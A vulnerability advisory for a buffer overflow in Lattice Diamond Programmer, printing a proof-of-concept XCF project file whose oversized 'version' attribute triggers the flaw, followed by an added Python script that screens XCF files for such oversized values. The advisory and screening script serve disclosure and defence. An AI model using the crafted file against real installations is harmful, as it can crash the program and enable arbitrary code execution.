Lattice Diamond Programmer Buffer Overflow Vulnerability


Published: 2012-06-21
Updated: 2012-08-23

Affected systems:
Lattice Semiconductor Diamond Programmer
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 54149

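Lattice Diamond is an FPGA design software tool suite.

Diamond Programmer 1.4.2 and other versions contain a buffer overflow vulnerability in their implementation that an attacker can exploit to execute arbitrary code.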

<*Source: Daniel Kazimirow
  *>

Test method:
--------------------------------------------------------------------------------

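Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

Daniel Kazimirow provided the following test method: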

/-----
<?xml version='1.0' encoding='utf-8' ?>
<!DOCTYPE        ispXCF    SYSTEM    "IspXCF.dtd" >
<ispXCF
version="8.9.09.09999999999AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
    <Comment></Comment>
    <Chain>
        <Comm>JTAG</Comm>
        <Device>
            <Pos>1</Pos>
            <Vendor>Lattice</Vendor>
            <Family>ispLSI 5000VE</Family>
            <Name>5256VE</Name>
            <IDCode>0x00368043</IDCode>
            <Package>128-pin TQFP</Package>
            <PON>ispLSI5256VE-XXLT128</PON>
            <Bypass>
                <InstrLen>5</InstrLen>
                <InstrVal>11111</InstrVal>
                <BScanLen>1</BScanLen>
                <BScanVal>0</BScanVal>
            </Bypass>
            <File>C:\ispTOOLS\ispvmsystem\TutorialU6vea.jed</File>
            <FileTime>05/17/02 18:15:33</FileTime>
            <JedecChecksum>0xF9BD</JedecChecksum>
            <Operation>Erase,Program,Verify</Operation>
            <Option>
                <SVFVendor>JTAG STANDARD</SVFVendor>
                <IOState>HighZ</IOState>
                <IOVectorData>0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000</IOVectorData>
                <Reinitialize value="TRUE"/>
                <OverideUES value="TRUE"/>
                <TCKFrequency>1.000000 MHz</TCKFrequency>
                <SVFProcessor>ispVM</SVFProcessor>
                <Usercode>0x0000F9BD</Usercode>
            </Option>
        </Device>
    </Chain>
    <ProjectOptions>
        <Program>SEQUENTIAL</Program>
        <Process>ENTIRED CHAIN</Process>
        <OperationOverride>No Override</OperationOverride>
        <StartTAP>TLR</StartTAP>
        <EndTAP>TLR</EndTAP>
        <DeGlitch value="TRUE"/>
        <VerifyUsercode value="TRUE"/>
        <PinSetting>
            TMS    LOW;
            TCK    LOW;
            TDI    LOW;
            TDO    LOW;
            TRST    ABSENT;
            CableEN    HIGH;
        </PinSetting>
    </ProjectOptions>
</ispXCF>
-----/

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

Lattice Semiconductor
---------------------
The vendor has not yet released a patch or upgrade. Users of this software should watch the vendor's home page for the latest version:

http://www.latticesemi.com/products/designsoftware/programmer/index.cfm
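
As an interim check while no vendor fix is available, the following added example (not part of the original advisory or of any Lattice tooling) screens XCF project files before they are opened in Diamond Programmer. It flags an oversized or malformed version attribute on the ispXCF root element, which is where the test file above places its long string; the length limits and version pattern are assumptions, and the sample documents are constructed.

```python
import re
import xml.etree.ElementTree as ET

# Assumed limits, not taken from the advisory: tune them to the files you use.
MAX_VERSION_LEN = 32      # a dotted version string is only a few characters
MAX_VALUE_LEN = 1024      # other attribute values and element text
VERSION_RE = re.compile(r"\d+(\.\d+)*")

def check_xcf(data):
    """Return a list of findings for one XCF document (empty list = none)."""
    try:
        # expat does not fetch the external IspXCF.dtd named in the DOCTYPE
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return ["not well-formed XML: %s" % exc]
    findings = []
    if root.tag != "ispXCF":
        findings.append("unexpected root element <%s>" % root.tag)
    version = root.get("version", "")
    if len(version) > MAX_VERSION_LEN:
        findings.append("version attribute is %d characters long" % len(version))
    elif not VERSION_RE.fullmatch(version):
        findings.append("version attribute is not a dotted number: %r" % version)
    for elem in root.iter():
        for name, value in elem.attrib.items():
            if elem is root and name == "version":
                continue  # already reported above
            if len(value) > MAX_VALUE_LEN:
                findings.append("<%s> attribute %s is %d characters long"
                                % (elem.tag, name, len(value)))
        text = (elem.text or "").strip()
        if len(text) > MAX_VALUE_LEN:
            findings.append("<%s> text is %d characters long" % (elem.tag, len(text)))
    return findings

# Constructed samples: a short version string and an oversized one.
TEMPLATE = (b"<?xml version='1.0' encoding='utf-8' ?>\n"
            b'<!DOCTYPE ispXCF SYSTEM "IspXCF.dtd" >\n'
            b'<ispXCF version="%s"><Chain><Comm>JTAG</Comm></Chain></ispXCF>')
BENIGN = TEMPLATE % b"8.9.09"
OVERSIZED = TEMPLATE % (b"8.9.09." + b"A" * 600)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(label, check_xcf(doc) or "no findings")
```

A file that fails to parse is reported as a finding rather than passed through, so truncated or deliberately malformed project files are also held back for review.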
